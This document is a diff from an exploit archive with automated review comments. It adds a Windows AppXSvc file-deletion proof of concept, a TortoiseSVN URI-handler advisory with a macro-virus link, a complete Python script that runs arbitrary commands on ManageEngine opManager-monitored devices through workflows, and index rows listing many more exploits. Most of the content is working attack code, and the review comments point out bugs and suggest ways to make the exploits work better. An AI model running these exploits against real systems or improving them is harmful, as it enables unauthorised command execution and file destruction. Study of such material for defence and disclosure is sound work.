|
||||||
|
if (dirExists(strfpath) == true) {
|
||||||
|
printf("Something Went Wrong");
|
||||||
|
printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
|
||||||
|
command = "explorer ";
|
||||||
|
command.append(strfpath);
|
||||||
|
system(command.c_str());
|
||||||
|
_getch();
|
||||||
|
goto Continue;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
Continue:
|
||||||
|
printf(" Done\n");
|
||||||
|
Sleep(3000);
|
||||||
|
printf("[+] Attempting to Create Junction To Target ...\n");
|
||||||
|
command = "mklink /J ";
|
||||||
|
command.append("\"");
|
||||||
|
command.append(strfpath);
|
||||||
|
command.append("\"");
|
||||||
|
command.append(" ");
|
||||||
|
command.append("\"");
|
||||||
|
command.append(path);
|
||||||
|
command.append("\"");
|
||||||
|
system(command.c_str());
|
||||||
|
printf("Done\n");
|
||||||
|
Sleep(3000);
|
||||||
|
printf("[+] Firing Up MS-Edge Again ...\n");
|
||||||
|
StartEdge();
|
||||||
|
do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe"));
|
||||||
|
Sleep(3000);
|
||||||
|
StartEdge();
|
||||||
|
command = "explorer ";
|
||||||
|
command.append(path);
|
||||||
|
printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
|
||||||
|
system(command.c_str());
|
||||||
|
printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
|
||||||
|
_getch();
|
||||||
|
printf("Cleaning ...");
|
||||||
|
_wremove(szBuffsrc);
|
||||||
|
_wrmdir(szBuffsrc);
|
||||||
|
ExitProcess(EXIT_SUCCESS);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
int main(int argc, char* argv[]) {
|
||||||
|
if (argc == 2) {exploit(argv[1]);}
|
||||||
|
else {
|
||||||
|
printf("# Author : Abdelhamid Naceri\n");
|
||||||
|
printf("# Tested On Windows 10 1903 32&64bit\n");
|
||||||
|
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
|
||||||
|
printf("[!] Usage : poc.exe TargetPath");
|
||||||
|
}
|
||||||
|
return EXIT_SUCCESS;
|
||||||
|
}
|
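Review bot: `remove_dir(roamingpath);` in exploit() passes the bare suffix `\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\RoamingState` rather than the profile-qualified path; `froamingpath` is built from `USERPROFILE` plus `roamingpath` a few lines earlier and then never used, so the RoamingState wipe that the comment says must happen first is attempted against a path relative to the current drive root and silently does nothing. It should be `remove_dir((wchar_t*)froamingpath.c_str());`, matching the `szBuffsrc` call that follows. Two smaller points in the same hunk: `IsProcessRunning` calls `Process32First` and then only compares entries returned by `Process32Next`, so the first process in the snapshot is never checked, and neither snapshot helper tests the `CreateToolhelp32Snapshot` result against `INVALID_HANDLE_VALUE`; and `string strfpath(fpath.begin(), fpath.end());` narrows each `wchar_t` to a `char`, so for a profile path containing non-ASCII characters `dirExists(strfpath)` and the `mklink /J` command operate on a different path from the one `remove_dir(szBuffsrc)` wipes. `int attempt = 0;` is also unused.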
194
exploits/windows/webapps/47252.txt
Normal file

@ -0,0 +1,194 @@
Document Title:
===============
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2188

Product:
https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/

Ticket: https://groups.google.com/forum/#!forum/tortoisesvn

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422

CVE-ID:
=======
CVE-2019-14422


Release Date:
=============
2019-08-13


Vulnerability Laboratory ID (VL-ID):
====================================
2188


Common Vulnerability Scoring System:
====================================
8.8


Vulnerability Class:
====================
Code Execution


Current Estimated Price:
========================
4.000€ - 5.000€


Product & Service Introduction:
===============================
TortoiseSVN is a really easy to use Revision control / version control /
source control software for Windows.
It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and
easy user interface for Subversion.
It is developed under the GPL. Which means it is completely free for
anyone to use, including in a commercial
environment, without any restriction. The source code is also freely
available, so you can even develop your
own version if you wish to. Since it's not an integration for a specific
IDE like Visual Studio, Eclipse or
others, you can use it with whatever development tools you like, and
with any type of file.

(Copy of the about page: https://tortoisesvn.net/about.html )


Abstract Advisory Information:
==============================
A vulnerability laboratory researcher (vxrl team) discovered a remote
code execution vulnerability in the TortoiseSVN v1.12.1 software.


Vulnerability Disclosure Timeline:
==================================
2019-08-13: Public Disclosure (Vulnerability Laboratory)

Affected Product(s):
====================
TortoiseSVN
Product: TortoiseSVN - Software 1.12.1


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A remote code execution vulnerability has been uncovered in the official
TortoiseSVN v1.12.1 software.
The vulnerability typ allows remote attackers to execute arbitrary codes
to compromise a target computer system.

The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
operation on Excel workbooks, which could be used to open remote
workbooks without protection from macro security settings to execute
arbitrary code.

The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
customised diff on [file1] and [file2] based on the file extension.
For xls files, it will execute the script `diff-xls.js` using wscript,
which will open the two files for analysis without any macro
security warning. An attacker can exploit this by putting a macro virus
in a network drive, and force the victim to open the workbooks
and execute the macro inside. Since the macro is triggered through
wscript, to make the attack less visible, one could kill the wscript
process and quit the excel program after the code was executed.


Proof of Concept (PoC):
=======================
The vulnerability could be triggered by visiting a specially crafted URL
via web browser.
To reproduce the vulnerability, one could simply create a .url file or
open the URL with a browsers,
but a notification prompt may be shown for the latter case.

<a
href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout
the Repo with TortoiseSVN</a>

where VBoxSvrv is the remote network drive controlled by the attacker,
v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.

Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
Password: 23vxrl23

PoC: Video
https://www.youtube.com/watch?v=spvRSC377vI


Security Risk:
==============
The security risk of the remote code execution vulnerability in the
software component is estimated as high.


Credits & Authors:
==================
PingFanZettaKe [VXRL Team] -
https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
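Review bot: the PoC link `href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'` has lost its path separators; read together with the explanation that follows ("VBoxSvrv is the remote network drive", "v.xlsm is the macro virus and w.xlsx is just an empty excel workbook"), the intended arguments are UNC paths of the form `\\VBoxSvr\v.xlsm` and `\\VBoxSvr\w.xlsx`, and the advisory should write them that way so the share name and the file names are not run together. The classification block also overstates the vector relative to the Technical Details section: "Exploitation Technique: Remote", "Authentication Type: Pre auth - no privileges" and "User Interaction: Low User Interaction" describe a link the victim has to open (the PoC section itself admits a browser "notification prompt may be shown"), after which Excel is launched on an attacker-controlled share and the macro runs; that is client-side, user-assisted code execution, and the bare "8.8" under Common Vulnerability Scoring System should state the vector string it was scored from. Finally, the Vulnerability Disclosure Timeline carries only the public disclosure date with no vendor contact or fixed-version entry, and the text names `diff-xls.js` but not where it ships with TortoiseSVN or why the macro security warning does not apply when wscript opens the workbooks; both belong in a published advisory.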
266
exploits/windows/webapps/47255.py
Executable file

@ -0,0 +1,266 @@
#!/usr/bin/env python3

# Exploit Title: ManageEngine opManager Authenticated Code Execution
# Google Dork: N/A
# Date: 08/13/2019
# Exploit Author: @kindredsec
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/network-monitoring/download.html
# Version: 12.3.150
# Tested on: Windows Server 2016
# CVE: N/A

import requests
import re
import random
import sys
import json
import string
import argparse

C_WHITE = '\033[1;37m'
C_BLUE = '\033[1;34m'
C_GREEN = '\033[1;32m'
C_YELLOW = '\033[1;33m'
C_RED = '\033[1;31m'
C_RESET = '\033[0m'
LOGIN_FAIL_MSG = "Invalid username and/or password."

def buildRandomString(length=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))


def getSessionData(target, user, password):

session = requests.Session()
session.get(target)

# Login Sequence
randSid = random.uniform(-1,1)
getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
postData = { "eraseAutoLoginCookie" : "true" }
session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )

postData = { "loginFromCookieData" : "false",
"ntlmv2" : "false",
"j_username" : user,
"j_password" : password
}
initialAuth = session.post( url = target + "/j_security_check", data = postData )


if LOGIN_FAIL_MSG in initialAuth.text:

print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
sys.exit(1)

elif initialAuth.status_code != 200:
print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
sys.exit(1)

apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
apiKey = apiKeyReg.group(0).split('"')[1]

return { "session" : session , "apiKey" : apiKey }




def getDeviceList(target, session, apiKey):

deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )

devices = {}
devicesJsonParsed = json.loads(deviceList.text)
for row in devicesJsonParsed["rows"]:
devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]

return devices



def buildTaskWindows(target, session, apiKey, device, command):

# Build Task
taskName = buildRandomString()
workFlowName = buildRandomString(15)

jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
jsonData += '"' + taskName + '"'
jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":"""
jsonData += '"' + command + '"'
jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
jsonData += '"' + workFlowName + '"'
jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
jsonData += '"' + device + '"'
jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""

makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })

if "has been created successfully" in makeWorkFlow.text:
print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
else:
print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
sys.exit(1)

return workFlowName


def buildTaskLinux(target, session, apiKey, device, command):

taskName = buildRandomString()
workFlowName = buildRandomString(15)

jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
jsonData += '"' + taskName + '"'
jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":"""
jsonData += '"' + command + '"'
jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
jsonData += '"' + workFlowName + '"'
jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
jsonData += '"' + device + '"'
jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""

makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })

if "has been created successfully" in makeWorkFlow.text:
print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
else:
print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
sys.exit(1)

return workFlowName


# Get the ID of the newly created workflow
def getWorkflowID(target, session, apiKey, workflowName):

getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })

rbID = -100
workflowJsonParsed = json.loads(getID.text)
for wf in workflowJsonParsed:
if wf['name'] == workflowName:
rbID = wf['rbID']

if rbID == -100:
print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
sys.exit(1)

return rbID


def getDeviceID(target, session, apiKey, rbID, device):

getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
wfDevicesJsonParsed = json.loads(getDevices.text)
wfDevices = wfDevicesJsonParsed["defaultDevices"]
deviceID = list(wfDevices.keys())[0]

return deviceID



def runWorkflow(target, session, apiKey, rbID, device):

targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)

print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 } )

if re.match(r"^\[.*\]$", workflowExec.text.strip()):
print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
else:
print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
sys.exit(1)

deleteWorkflow(target, session, apiKey, rbID)
print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")


def deleteWorkflow(target, session, apiKey, rbID):

print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })


def main():

parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")

args = parser.parse_args()

insufficient_args = False
if not args.u:
print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
insufficient_args = True
if not args.t:
print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
insufficient_args = True
if not args.p:
print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
insufficient_args = True
if not args.c:
print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
insufficient_args = True

if insufficient_args:
sys.exit(1)


sessionDat = getSessionData(args.t, args.u, args.p)
session = sessionDat["session"]
apiKey = sessionDat["apiKey"]

devices = getDeviceList(args.t, session, apiKey)

# if there's only one device in the OpManager instance, default to running commands on that device;
# no need to ask the user.
if len(devices.keys()) == 1:
device = list(devices.keys())[0]
else:
print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
print("")
counter = 1
for key in devices.keys():
print(f" {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")

print("")
while True:
try:
prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
devSelect = int(input(prompt))
except KeyboardInterrupt:
sys.exit(1)
except ValueError:
print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
sys.exit(1)

if devSelect < 1 or devSelect > len(list(devices.keys())):
print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
sys.exit(1)

else:
device = list(devices.keys())[counter - 1]
break

# don't hate, it works doesn't it?
if "indows" in devices[device][1]:
workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
else:
workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)

workflowID = getWorkflowID(args.t, session, apiKey, workflowName)
runWorkflow(args.t, session, apiKey, workflowID, device)


main()
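Review bot: the device menu in `main()` never advances `counter`: the `for key in devices.keys():` loop prints `counter` without incrementing it, so every device is listed as `1:`, and the selection line `device = list(devices.keys())[counter - 1]` then ignores `devSelect` altogether and always picks the first device, even though `devSelect` was range-checked on the line above. The loop needs `counter += 1` and the assignment should index with `devSelect - 1`. Other points in this hunk: the `-c` value is spliced into the workflow JSON with `jsonData += '"' + command + '"'`, so any command containing `"` or `\` yields invalid `jsonData` and the `addWorkflow` call fails; building the task as a dict and emitting it with `json.dumps` fixes that and would also collapse the template duplicated between `buildTaskWindows` and `buildTaskLinux`, whose only differences are the `cmdLine` strings. `apiKeyReg.group(0)` is called without checking that `re.search` matched, so a changed login page becomes an `AttributeError` instead of the error message the surrounding checks print. The missing-username message says "Please specify a username with '-t'" although the flag is `-u`. `deleteWorkflow` is reached only on the success path of `runWorkflow`, so a failed execution leaves the workflow named `workFlowName` behind on the target. And `main()` runs at import time; an `if __name__ == "__main__":` guard is the usual form.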
@ -6525,6 +6525,8 @@ id,file,description,date,author,type,platform,port
47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
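Review bot: both added rows are typed `dos`, but the 47248 description reads "Windows PowerShell - Unsanitized Filename Command Execution", and command execution on the local host is what this CSV files under `local` (see the `local,windows` rows in the `@ -10632` hunk below). Either the description should say the entry only demonstrates a crash, or the type and the `exploits/windows/dos/47248.py` path should change together to `local`.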
@ -10632,6 +10634,7 @@ id,file,description,date,author,type,platform,port
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17606,6 +17609,7 @@ id,file,description,date,author,type,platform,port
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41606,3 +41610,11 @@ id,file,description,date,author,type,platform,port
47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80
47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php,
47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80
47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80
47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80
47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,
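Review bot: two of the new rows do not fit the way this section classifies entries. 47252 is the TortoiseSVN `tsvncmd:` URI-handler advisory, a desktop client reached through a link, yet it is filed as `webapps,windows` with no port; `remote,windows`, the type the `@ -10632` hunk above uses for client-side Windows entries, fits better, and the path would then be `exploits/windows/remote/47252.txt` rather than `exploits/windows/webapps/`. 47255 (the ManageEngine opManager web console) is `webapps,windows` with an empty port column while every other `webapps` row in this hunk except 47235 carries `80`; if the console does not listen on 80 the actual port should be recorded rather than left blank. The same inconsistency shows between 47234 and 47235, which target the same smartRTU device but only one of which has a port.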